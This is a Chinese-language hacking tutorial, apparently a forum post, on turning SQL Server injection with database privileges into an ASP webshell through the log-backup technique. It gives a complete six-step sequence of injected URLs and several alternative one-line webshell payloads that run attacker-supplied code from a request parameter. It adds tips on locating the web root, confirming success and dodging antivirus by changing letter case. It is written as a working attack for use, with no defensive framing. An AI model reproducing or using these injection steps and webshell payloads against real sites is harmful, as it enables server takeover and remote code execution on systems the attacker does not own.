當(dāng)SQL注入是得到DB權(quán)限時(shí)候，接下來可以做的工作很多，象找管理員密碼，后臺管理這些都可以幫助你拿到WEBSHELL,但是這篇文章講的是log備份,LOG備份出來的小馬的體積小,而且備份的成功的可性很大，所以是我作為對DB權(quán)限的第一種試探方法.

但是在LOG備份中,我們經(jīng)常會遇到一些很讓我們頭痛的問題,那就是閉合的問題，我在這里做個總結(jié)，也
好讓我們對不能閉合的方法有一個全面的了解.

1.先介紹下LOG備份，這個相信大家都很熟悉了，我還是習(xí)慣在IE里直接提交，返回正常的頁面就說這一步的操作就成功了，如果沒有返回正常的頁面，我們就可以根據(jù)IE返回的錯誤來找他的原因.(這里說下要將IE的錯誤提示給打開),LOG的格式如下所示:
http://www.site.com/xx.asp?id=xxx;alter database databasename set RECOVERY FULL
http://www.site.com/xx.asp?id=xxx;create table cmd (a image)--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'c:cmd' with init
http://www.site.com/xx.asp?id=xxx;insert into cmd (a) values ('<%%Execute(request("go"))%%>')--
http://www.site.com/xx.asp?id=xxx;backup log databasename to disk = 'x:xxxxxxasp1.asp'--
http://www.site.com/xx.asp?id=xxx;drop table cmd--

分為6步操作,最容易出錯的就是第4步的操作，經(jīng)常返回沒有閉合的問題，下面就是一些我們可以將
values中的內(nèi)容可以進(jìn)行更換的方式,當(dāng)我們的一種方式不行的話，就可以換另一種方式，當(dāng)所有的方式
都換完了，沒有什么好說的，要么就放棄，要么就換另一種方式繼續(xù)，想列目錄找數(shù)據(jù)庫下載，后臺.這
里就不多說了，可以提換的內(nèi)容有:
a).<%%Execute(request("go"))%%>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%Execute(request("l"))%>
<%execute request("a")%>

2.LOG備份要注意的一些問題:
a).要注意你現(xiàn)在的機(jī)器是不是WEB主機(jī),簡單的方法就是翻他的目錄，看有沒有IIS安裝的文件
b).當(dāng)你確定你要找的確實(shí)是WEN主機(jī)時(shí)，就可以找他的站點(diǎn)目錄了,這個也很重要，是步驟5的操作，如果備份到一個錯誤的目錄，當(dāng)然就沒有辦法訪問了
c).備份成功后，你就可以試著用客戶端去連接，這個地方也有人弄錯，現(xiàn)在用的字段是go,你的客戶端的
相關(guān)字段也為go
d).用ececute正常備份出來的是用錯誤提示的，當(dāng)你的顯示500錯誤時(shí)，請你將的IE錯誤提示打開，當(dāng)顯示
Microsoft VBScript 運(yùn)行時(shí)錯誤 錯誤 '800a000d'
類型不匹配: 'execute'
時(shí)候表示你已經(jīng)成功了，連接吧!!
e).還有極端的時(shí)候你備份出來的一句話被殺(當(dāng)你確定你確實(shí)是備份在WEB主機(jī)的對應(yīng)目錄是),你可以將

上面的VALUES字段中的值做幾個大小寫轉(zhuǎn)換，一般是沒有問題的..

3.因?yàn)檫@篇文章用了很多前輩的東西，不敢說是原創(chuàng)，只能算做是討論，我會將我所知道的東西在以后的
日子里一一更新上去..謝謝!!
4.感謝各位前輩提出這么一個好方法否則就不會有這篇文章了..

最新評論